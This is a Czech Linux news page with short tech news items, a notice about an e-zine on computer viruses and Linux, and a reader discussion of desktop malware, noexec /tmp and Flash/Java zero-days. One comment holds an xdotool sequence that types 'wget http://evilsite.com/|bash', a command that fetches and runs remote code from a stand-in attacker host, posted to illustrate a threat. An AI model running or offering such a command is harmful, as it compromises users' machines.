O víkendu probíhá konference OpenAlt 2025. Na programu je spousta zajímavých přednášek. Pokud jste v Brně, stavte se. Vstup zdarma.
Josef Průša představil novou velkoformátovou uzavřenou CoreXY 3D tiskárnu Prusa CORE One L a nový open source standard chytrých cívek OpenPrintTag i s novou přepracovanou špulkou.
Na GOG.com běží Autumn Sale. Při té příležitosti je zdarma hororová počítačová hra STASIS (ProtonDB: Platinum).
Ubuntu 25.10 má nově balíčky sestavené také pro úroveň mikroarchitektury x86-64-v3 (amd64v3).
Byla vydána verze 1.91.0 programovacího jazyka Rust (Wikipedie). Podrobnosti v poznámkách k vydání. Vyzkoušet Rust lze například na stránce Rust by Example.
Ministerstvo průmyslu a obchodu vyhlásilo druhou veřejnou soutěž v programu TWIST, který podporuje výzkum, vývoj a využití umělé inteligence v podnikání. Firmy mohou získat až 30 milionů korun na jeden projekt zaměřený na nové produkty či inovaci podnikových procesů. Návrhy projektů lze podávat od 31. října do 17. prosince 2025. Celková alokace výzvy činí 800 milionů korun.
Google v srpnu oznámil, že na „certifikovaných“ zařízeních s Androidem omezí instalaci aplikací (včetně „sideloadingu“) tak, že bude vyžadovat, aby aplikace byly podepsány centrálně registrovanými vývojáři s ověřenou identitou. Iniciativa Keep Android Open se to snaží zvrátit. Podepsat lze otevřený dopis adresovaný Googlu nebo petici na Change.org.
Byla vydána nová verze 18 integrovaného vývojového prostředí (IDE) Qt Creator. S podporou Development Containers. Podrobný přehled novinek v changelogu.
Cursor (Wikipedie) od společnosti Anysphere byl vydán ve verzi 2.0. Jedná se o multiplatformní proprietární editor kódů s podporou AI (vibe coding).
Google Chrome 142 byl prohlášen za stabilní. Nejnovější stabilní verze 142.0.7444.59 přináší řadu novinek z hlediska uživatelů i vývojářů. Podrobný přehled v poznámkách k vydání. Opraveno bylo 20 bezpečnostních chyb. Za nejvážnější z nich bylo vyplaceno 50 000 dolarů. Vylepšeny byly také nástroje pro vývojáře.
Zavirovaný počítač je vždy důvod ke smutku. Pokud se chcete takových starostí zbavit, můžete si pročíst openMagazin, který se tomuto tématu věnuje. Pak si můžete udělat přehled a např. si nainstalovat některou z distribucí Linuxu.
Hned v prvním článku tématického okruhu se dozvíte, co je to linuxová distribuce a které jsou oblíbené. V dalších článcích jsou rozebírána jednotlivá desktopová prostředí, jejich výhody a nevýhody.
OpenMagazin (můžete si ho stáhnout) vám ukáže, že Evropa se přiklání k open-source softwaru. I v České republice se najde mnoho škol, které ho používají. Začtěte se do článku o jedné z nich. Recenze na hru Minecraft vás naláká k využití chvil odpočinku právě s ní.
Děkujeme všem, kteří kopírují, sdílejí a rozesílají e-zin všem svým známým a přátelům. Lidé z Liberixu ho vytvářejí pro vás, čtenáře, a také díky vašim darům může vycházet.
Tiskni
Sdílej:
Pokud bankovnictví používá elektronický podpis, jiná možnost než nějaký plugin není.Takže já si stáhnu z webu internetbankingu applet, spustím ho, dám mu soukromý klíč a něco v něm podepíšu? Jaký to má smysl? Pokud je kompromitovaný web, bude kompromitovaný i stahovaný applet.
mrkva@destiny:~$ cd /tmp mrkva@destiny:/tmp$ su Heslo: root@destiny:/tmp# mkdir noexec root@destiny:/tmp# chmod 777 noexec/ root@destiny:/tmp# mount -t tmpfs tmpfs noexec/ -o noexec root@destiny:/tmp# exit mrkva@destiny:/tmp$ cd noexec mrkva@destiny:/tmp/noexec$ cp /usr/bin/id . mrkva@destiny:/tmp/noexec$ ./id bash: ./id: Permission denied mrkva@destiny:/tmp/noexec$ /lib64/ld-linux-x86-64.so.2 ./id ./id: error while loading shared libraries: ./id: failed to map segment from shared object: Operation not permitted
.bashrc. Nebo zrovna tenhle konkrétní exploit je závislý na /tmp?
Když už útočník může zapisovat a spouštět kód z /tmp, tak může zapisovat taky třeba do .bashrc.Zajimalo by mne, co na to SELinux.
xdotool key Alt-F2 xdotool type xterm [RETURN] xdotool type "wget http://evilsite.com/|bash - ; logout"
I invoke.Tak takhle jsem se dlouho nenasmál
Ani já to nesleduju, ale řekl bych, že jeden ze zásadních rozdílů bude v poučenosti uživatelů různých platforem.To je. Ale pokud zmíněný OpenMagazin převede uživatele, kteří měli na Windows problém (a jsou tedy nepoučení) na Linux, jak si pomůžou?
Stejně tak jako v rozšířenosti Flashe zmíněného na různých platformách.Flash má i spousta linuxáků a dá se očekávat, že BFU přecházející z Windows ho bude chtít taky.
Flash? Java?Kdy byla naposledy ve Flashi nebo v Javě bezpečnostní chyba umožňující bez souhlasu uživatele spustit kód mimo pískoviště? Kolik takových chyb bylo celkem?
Flash? Java? 0day?
Mohl to být exploit na Flash nebo Javu nebo zeroday na Operu.V té první větě není nic o Opeře. V té druhé jste to sice rozepsal, ale pořád to nedává smysl. Myslel jste tedy tohle?
Mohl to být zero day exploit na Flash, Javu nebo na Operu.